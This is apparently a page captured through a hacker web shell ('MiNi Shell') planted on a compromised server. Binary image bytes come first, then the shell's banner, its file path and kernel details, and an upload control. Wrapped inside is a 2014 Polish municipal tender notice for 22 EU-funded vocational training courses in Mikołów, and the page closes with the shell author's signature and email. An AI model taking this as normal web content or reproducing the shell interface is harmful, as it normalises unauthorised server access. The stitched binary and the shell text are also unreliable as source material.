JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140627/215624-N-2014.html

<p class="kh_header"><b>Mikołów: Szkolenia zawodowe dla uczestników projektu systemowego Zakontraktuj swoją przyszłość współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki oraz osób z ich otoczenia</b><br>
<b>Numer ogłoszenia: 215624 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 2, 43-190 Mikołów, woj. śląskie, tel. 32 3242666, faks 32 3242694.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia zawodowe dla uczestników projektu systemowego Zakontraktuj swoją przyszłość współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki oraz osób z ich otoczenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> część	Nazwa szkolenia	min. l-ba godz.	l-ba osób
1	Opiekunka osób starszych, niepełnosprawnych, dzieci
Minimum tematyczne:
- rola i zadania opiekuna osób starszych, niepełnosprawnych, dzieci. Sylwetka zawodowa opiekuna,
- wykonywanie codziennych czynności z zakresu gospodarstwa domowego,
- wykonywanie czynności higienicznych przy podopiecznym,
- wspieranie biologicznych funkcji życiowych podopiecznego,
- organizowanie czasu podopiecznemu i dotrzymywanie towarzystwa,	łącznie 180


20


30

40

50

40
	2
2	Kierowca wózków jezdniowych z wymianą butli gazowych:
Minimum tematyczne:
- podział stosowanych wózków,
- budowa wózków,
- czynności operatora przed, w trakcie i po zakończeniu pracy,
- wiadomości z zakresu ładunkoznawstwa,
- wiadomości z zakresu bhp,
- wiadomości o dozorze technicznym,
- bezpieczne użytkowanie butli, w tym i bezpieczna wymiana,
- zajęcia praktyczne	łącznie 67	3
3	Obsługa kasy fiskalnej i komputera
Minimum tematyczne:
- elementy prawa,
- towaroznawstwo,
- dokumentacja handlowa i magazynowa,
- obsługa kas fiskalnych,
- ćwiczenia - program do fakturowania
- wykorzystywanie komputera do pracy w handlu	łącznie 70



30


40	11
4	Operator koparki
Minimum tematyczne:
- teoria
- praktyka	łącznie 202

116
86	1
5	Spawacz MAG + TIG 
Minimum tematyczne:
- teoria 
- praktyka	łącznie 250

30
220	4
6	Magazynier z obsługą wózka widłowego
Minimum tematyczne:
- sprzedawca magazynier,
- obsługa wózka widłowego	łącznie 120

60
60	7
7	Przepalacz gazowy
Minimum tematyczne:
- teoria 
- praktyka	łącznie 45

12
33	2
8	Animator zabaw dziecięcych
Minimum tematyczne:
- specyfika pracy animatora zabaw dziecięcych,
- zabawy poznawcze i integracyjne,
- zabawy z chustą animacyjną,
 - skręcanie zwierzątek  i innych form z baloników,
- wstęp do malowania twarzy,
- nowoczesne techniki plastyczne w pracy z dziećmi	łącznie 6	1
9	Obsługa komputera Ms Office - kurs podstawowy oraz średniozaawansowany
Minimum tematyczne:
- Word
- Excel,
- Power Point	łącznie 40	1
10	Kurs administracyjno - biurowy
Minimum tematyczne:
- elementy prawa administracyjnego,
- czynności biurowe,
- prowadzenie dokumentacji kadrowej i biurowej,
- wykorzystanie programów księgowych do pracy biurowej,
- zastosowanie komputerów w firmie	łącznie 90	1
11	Pomoc cukiernika
Minimum tematyczne:
- zasady bhp,
- towaroznawstwo surowców  ciastkarskich i cukierniczych
- systemy bezpieczeństwa i jakości zdrowotnej wyrobów ciastkarskich i cukierniczych
- technologia - teoretyczne podstawy produkcji ciastkarskiej i cukierniczej
- zasady zdobienia i dekorowania wyrobów ciastkarskich i cukierniczych
- technologie sporządzania wyrobów ciastkarskich
- zajęcia praktyczne	łącznie 100







40




60	1
12	CNC - programowanie i obsługa obrabiarek sterowanych numerycznie
Minimum tematyczne:
- teoria 
- praktyka	łączna 120


30
90	1
13	Masaż (I, II i III stopień):
Minimum tematyczne:
- I stopień
- II stopień
- III stopień	łącznie 180

60
60
60	1
14	Kucharz małej gastronomii
Minimum tematyczne:
- teoria 
- praktyka	łącznie 120

30
90	1
15	Wizaż i stylizacja paznokci
Minimum tematyczne:
- organizacja i higiena pracy,
- anatomia dłoni i stóp
- schorzenia dermatologiczne dłoni, stóp, paznokci
- preparaty kosmetyczne i lecznicze
- manicure kosmetyczny
- pedicure kosmetyczny
- stylizacja paznokci
- wprowadzenie (omówienie kuferka)
- klasyczny makijaż dzienny, wieczorowy, ślubny
- wykonywanie makijażu fantazyjnego twarzy i body painting	łącznie 100






60






40	2
16	Język angielski podstawowy, średniozaawansowany, zaawansowany		9
17	Język hiszpański podstawowy		3

18	Kurs komputerowy i internetowy
Minimum tematyczne:
- podstawowe pojęcia związane z komputerem
- podstawowa obsługa komputera
- współpraca komputera z urządzeniami
- podstawy edytora tekstu Ms Office i Openoffice
- podstawy arkusza kalkulacyjnego Ms Office i Openoffice
- podstawy prezentacji multimedialnych Ms Office i Openoffice
- podstawy internetu
- tworzenie skrzynek poczty elektronicznej oraz programy pocztowe
- komunikatory internetowe
- wyszukiwanie informacji w internecie
- portale społecznościowe	łącznie 70	9
19	Kurs komputerowy
Minimum tematyczne:
- krok po kroku w CorelDraw
- krok po kroku w Photoshop	łącznie 40	11
20	Warsztaty aktywizacyjne 
Tematy:
1.	Samopoznanie, diagnoza własnego potencjału, umiejętności potrzebne do skutecznego działania, asertywność, skuteczna motywacja
2.	Aktywne poruszanie się po rynku pracy, autoprezentacja, rozmowa kwalifikacyjna, dokumenty aplikacyjne
3.	Ukształtowanie kompetencji dobrego pracownika, umiejętności potrzebne do utrzymania pracy, dobra organizacja pracy, kreatywność w pracy	łącznie 9

3



3



3	13
21	Warsztaty promujące równość kobiet i mężczyzn
Minimum tematyczne:
- przeciwdziałanie dyskryminacji ze względu na płeć i wiek
- mity i stereotypy dotyczące płci
- mity polityki równości płci
- bariery równości płci
- różnice w pełnieniu ról społecznych przez kobiety i mężczyzn
- założenia polityki równości płci
- różnice potrzeb kobiet i mężczyzn
- wpływ kultury i mediów na wzorzec osobowy i role przyjmowane przez kobiety i mężczyzn
- równy status kobiet i mężczyzn w domu i na ryku pracy	łącznie 8	37
22	Trening umiejętności życiowych i zastępowania agresji
1.	Trening umiejętności życiowych:
- rozwijanie umiejętności interpersonalnych
- zwiększenie poczucia odpowiedzialności za własne życie
- nabycie umiejętności radzenia sobie w sytuacjach trudnych
- rozwój umiejętności lepszego rozumienia zachowań własnych oraz innych osób
2. Trening umiejętności prospołecznych:
- podstawowe umiejętności prospołeczne i ich zastosowanie w praktyce
- umiejętności emocjonalne
- alternatywne umiejętności wobec agresji
- umiejętność radzenia sobie ze stresem
- umiejętność planowania
3. Trening kontroli złości:
- czynniki wyzwalające złość
- rozpoznawanie sygnałów wskazujących na podwyższony stan napięcia emocjonalnego
- techniki zmniejszające poziom gniewu
- techniki nagradzania siebie za nieagresywne zachowania
4. Trening wnioskowania moralnego:
- nauka właściwej hierarchii wartości
- edukacja moralna
- uwzględnianie potrzeb i praw innych osób
- tolerancja	łącznie 16
4
4
4
4	11
Zamawiający ustala poniżej miesiące, w jakich winno być zrealizowane wsparcie:

Część I - Opiekunka osób starszych, niepełnosprawnych, dzieci
lipiec - sierpień
Część II - Kierowca wózków jezdniowych z wymianą butli gazowych
lipiec
Część III - Obsługa kasy fiskalnej i komputera
listopad
Część IV - Operator koparki
sierpień wrzesień październik
Część V - Spawacz MAG + TIG
lipiec, sierpień, wrzesień
Część VI - Magazynier z obsługą wózka widłowego
październik
Część VII - Przepalacz gazowy
lipiec
Część VIII - Animator zabaw dziecięcych
wrzesień
Część IX - Obsługa komputera Ms Office - kurs podstawowy oraz średniozaawansowany
sierpień
Część X - Kurs administracyjno - biurowy
wrzesień - październik
Część XI - Pomoc cukiernika
sierpień - wrzesień
Część XII - CNC - programowanie i obsługa obrabiarek sterowanych numerycznie
lipiec - sierpień
Część XIII- Masaż (I, II i III stopień)
lipiec, sierpień, wrzesień
Część XIV - Kucharz małej gastronomii
sierpień - wrzesień
Część XV - Wizaż i stylizacja paznokci
wrzesień
Część XVI- Język angielski podstawowy, średniozaawansowany, zaawansowany
Lipiec - sierpień czwartki 11-13
Część XVII - Język hiszpański podstawowy
Lipiec - sierpień wtorki 11-13
Cześć XVIII- Kurs komputerowy i internetowy
wrzesień
Część XIX - Kurs komputerowy
Wrzesień - październik 15-18 godzina
Część XX - Warsztaty aktywizacyjne 
10, 13, 14 październik
Część XXI - Warsztaty promujące równość kobiet i mężczyzn
4 listopad
Część XXII - Trening umiejętności życiowych i zastępowania agresji
6,13,20, 28 listopad 15-18godzina

Obowiązki wykonawcy:

1.	Wykonywanie czynności związanych z przedmiotem umowy z należytą starannością i czuwanie nad prawidłową realizacją.
2.	Współpraca z koordynatorem projektu i pracownikami socjalnymi pracującymi z uczestnikami projektu.
3.	Ubezpieczenie uczestników od następstw nieszczęśliwych wypadków.
4.	Przygotowanie po zakończonym szkoleniu/kursie protokołu zdawczo - odbiorczego.
5.	Wykonawca jest zobowiązany do natychmiastowego powiadomienia Zamawiającego o:
- niezgłoszeniu się uczestnika na szkolenie/kurs
- przerwaniu szkolenia/kursu lub rezygnacji z uczestnictwa uczestników
- każdorazowej nieobecności uczestnika na szkoleniu/kursie
- faktach innych mających bezpośredni wypływ na prawidłową realizację przedmiotu umowy.
6. Uczestnicy szkolenia/kursu winni mieć zapewnione:
- materiały dydaktyczne i biurowe konieczne do przeprowadzenia zajęć - odbiór materiałów musi zostać potwierdzony przez każdego uczestnika poprzez złożenie stosownego oświadczenia
- niezbędne maszyny, narzędzia, produkty konieczne do realizacji szkolenia/kursu
- warunki przebiegu szkolenia/kursu w oparciu o zasady BHP
- sale dydaktyczne powinny być wyposażone w odpowiednie miejsca siedzące, stoliki, sprzęt audiowizualny itp. dostosowany do potrzeb grupy słuchaczy
7. W celu potwierdzenia zrealizowania wsparcia Wykonawca winien prowadzić następującą dokumentację:
- listy obecności
- dzienniki zajęć
- oświadczenia uczestników o odbiorze materiałów, dydaktycznych, biurowych , cateringu
8. Wykonawca zapewni catering:
-  na zajęciach, których czas trwania dziennie przekroczy 4 godziny lekcyjne w postaci przerwy kawowej
- na zajęciach, których czas trwania dziennie przekroczy 6 godzin lekcyjnych w postaci przerwy kawowej i obiadu.

Warunki przeprowadzenia szkoleń/kursów:

1.	Szkolenia/kursy będą realizowane zgodnie z harmonogramem uzgodnionym z koordynatorem projektu. Zmiany harmonogramów winny być każdorazowo zaakceptowane przez Zamawiającego.
2.	Zamawiający uiści zapłatę za faktyczną ilość przeszkolonych uczestników, a w przypadku skreślenia z listy uczestników w trakcie trwania szkolenia/kursu Zamawiający zapłaci proporcjonalnie do ilości wykonanych godzin. 
3.	Zamawiający dopuszcza możliwość dołączenia uczestników do grup kursantów realizujących tożsame szkolenie/kurs.
4.	Ustala się, że do czasu trwania szkolenia/kursu będzie wliczony czas przeznaczony na egzamin.
5.	Zajęcia będą odbywać się w dni powszednie tj. od poniedziałku do piątku, w godzinach od 8.00 do 18.00. Jednakże liczba godzin dziennie nie może przekroczyć ośmiu godzin. 
6.	Miejsce szkolenia winno zostać przygotowane w taki sposób, aby było dostosowane do wymogów bhp, zapewniało wszelkie sprzęty niezbędne do prawidłowego wykonania przedmiotu umowy.
7.	W przypadku, gdy zakres szkolenia wymagałby przemieszczenia się uczestników do innego miejsca niż wskazane w ofercie Wykonawca zapewni przewóz uczestnikom we własnym zakresie do miejsca odbywania się zajęć i z powrotem. 
8.	Wykonawca jest winien zapewnić uczestnikom szkoleń/kursów, aby były one realizowane zgodnie z przepisami bhp, należy także zabezpieczyć uczestników w niezbędną odzież ochronną, gdy wymaga tego charakter szkolenia/kursu. 
9.	Wykonawca zapewni uczestnikom na własność materiały szkoleniowe tj. podręczniki, skrypty, teczki, notesy, długopisy, ołówki, zeszyty itp.). Materiał powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013. Uczestnicy kwitują odbiór materiałów własnoręcznym podpisem. Oryginały pokwitowania Wykonawca przekaże Zamawiającemu po zrealizowaniu usługi. 
10.	Zamawiający będzie przesyłał Wykonawcy każdorazowo listę uczestników szkolenia/kursu. 
11.	Wykonawca dokona ubezpieczenia uczestników od następstw nieszczęśliwych wypadków. Kopię polis ubezpieczeniowych Wykonawca przekaże Zamawiającemu. 
12.	Na początku i na zakończeniu szkolenia/kursu zostaną z uczestnikami przeprowadzone ankiety oceniające wsparcie. 
13.	Po zakończeniu szkolenia/kursu każdy uczestnik otrzyma zaświadczenie potwierdzające nabyte uprawnienia. Wszelkie dyplomy, zaświadczenia, certyfikaty winny być oznakowane logiem Europejskiego Funduszu Społecznego i informacją o współfinansowaniu ze środków EFS.
14.	Wykonawca jest zobowiązany do przestrzegania zapisów Ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (Dz. U. z 2002r Nr 101 poz. 926 z późn. zm.) przy gromadzeniu oraz przetwarzaniu danych osobowych osób kierowanych na szkolenia/kursy. 
15.	Wszelkie obowiązki i czynności wynikające z zakresu zamówienia Wykonawca zapewni na swój koszt i we własnym zakresie.
16. Realizacja zamówienia winna nastąpić, nie dalej niż 20 km od siedziby Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponuje co najmniej 1 osobą przewidzianą do wykonania zamówienia, o które ubiega się Wykonawca posiadającą co najmniej sześciomiesięczne doświadczenie w prowadzeniu szkolenia/kursu  a także posiadać wykształcenie w zakresie, którego dotyczy szkolenie o które ubiega się Wykonawca</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>obiekt szkoleniowy przystosowany do prowadzenia szkolenia/kursu teoretycznego jak i praktycznego nie dalej niż 20 km od siedziby Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Mikołowie
ul. Kolejowa 2, 
43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2014 godzina 10:15, miejsce: Miejski Ośrodek Pomocy Społecznej w Mikołowie
ul. Kolejowa 2, 
43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com